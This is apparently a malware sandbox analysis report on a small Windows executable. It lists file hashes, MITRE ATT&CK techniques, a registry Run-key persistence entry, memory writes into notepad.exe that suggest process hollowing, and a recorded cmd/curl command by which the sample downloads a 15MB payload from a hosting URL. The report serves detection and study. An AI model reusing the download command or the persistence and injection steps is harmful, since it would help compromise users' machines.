a403e0f85230ac445fba27848e77bdf17704591498f95f5ff6bb623c9813af81

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
22-05-2024 04:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a403e0f85230ac445fba27848e77bdf17704591498f95f5ff6bb623c9813af81.exe
Size

15KB
MD5

dd1bea87e4a633db8ff8edf04fc9799a
SHA1

45a3f53cb64b0dff1d8f8104415f93e59077d60b
SHA256

a403e0f85230ac445fba27848e77bdf17704591498f95f5ff6bb623c9813af81
SHA512

76d0cf3290a6fd1f12c49bc0f8e032ec94bf7e93965b7c2a353f19757c9199eaaf30c668639672cf6cca664c13cd374018ca04d65c0c2c89210c8882b7ccc748
SSDEEP

192:YQ5cz5askJEQ0unUOVzVre7RCldFT/alxbHgJTVXD3Q5tfzcZE4U:YQUsEQ0unb5YwpDafzg7XD39t

Score

6^/10

persistence

Malware Config

Signatures

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyPersistentProgram = "C:\\Users\\Admin\\Music\\hollow.exe"	a403e0f85230ac445fba27848e77bdf17704591498f95f5ff6bb623c9813af81.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4764 set thread context of 1660	4764	a403e0f85230ac445fba27848e77bdf17704591498f95f5ff6bb623c9813af81.exe	89

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 4764 wrote to memory of 2100	4764	a403e0f85230ac445fba27848e77bdf17704591498f95f5ff6bb623c9813af81.exe	82
PID 4764 wrote to memory of 2100	4764	a403e0f85230ac445fba27848e77bdf17704591498f95f5ff6bb623c9813af81.exe	82
PID 2100 wrote to memory of 1904	2100	cmd.exe	84
PID 2100 wrote to memory of 1904	2100	cmd.exe	84
PID 4764 wrote to memory of 1660	4764	a403e0f85230ac445fba27848e77bdf17704591498f95f5ff6bb623c9813af81.exe	89
PID 4764 wrote to memory of 1660	4764	a403e0f85230ac445fba27848e77bdf17704591498f95f5ff6bb623c9813af81.exe	89
PID 4764 wrote to memory of 1660	4764	a403e0f85230ac445fba27848e77bdf17704591498f95f5ff6bb623c9813af81.exe	89

C:\Users\Admin\AppData\Local\Temp\a403e0f85230ac445fba27848e77bdf17704591498f95f5ff6bb623c9813af81.exe
"C:\Users\Admin\AppData\Local\Temp\a403e0f85230ac445fba27848e77bdf17704591498f95f5ff6bb623c9813af81.exe"
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4764
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c cd C:\Users\Admin\AppData\Local\Temp\ && curl -s -L https://github.com/microsoft/vscode/files/15363287/silk.txt -o ecode.txt
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2100
- - C:\Windows\system32\curl.exe
    curl -s -L https://github.com/microsoft/vscode/files/15363287/silk.txt -o ecode.txt
    3⤵
    PID:1904
- C:\Windows\SYSTEM32\notepad.exe
  notepad.exe
  2⤵
  PID:1660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ecode.txt

Filesize
15.3MB

MD5
a017b8cf248a78280b133321d574e05b

SHA1
c74232e9ef38e7ad9f3603f911384d34cf761485

SHA256
1c8cd6933e6739462ffa39944426d1f744fa2be0687d857926bd2c9104a7f689

SHA512
107a1d39bddc15ba2f8a7e946c1f0172310532b66efeeab5dc9d363746a7ebc97995831c1709b9496b0c7a713f4a754f36be8bde996cc2249c35c81cfd477abd

Download Submit
memory/1660-2-0x000001333E240000-0x000001333F183000-memory.dmp

Filesize
15.3MB

Download
memory/1660-3-0x0000013341C00000-0x0000013342BB2000-memory.dmp

Filesize
15.7MB

Download
memory/1660-4-0x0000013341C00000-0x0000013342BB2000-memory.dmp

Filesize
15.7MB

Download
memory/1660-5-0x0000013341C00000-0x0000013342BB2000-memory.dmp

Filesize
15.7MB

Download
memory/1660-6-0x0000013341C00000-0x0000013342BB2000-memory.dmp

Filesize
15.7MB

Download
memory/1660-7-0x0000013341C00000-0x0000013342BB2000-memory.dmp

Filesize
15.7MB

Download
memory/1660-8-0x0000013341C00000-0x0000013342BB2000-memory.dmp

Filesize
15.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads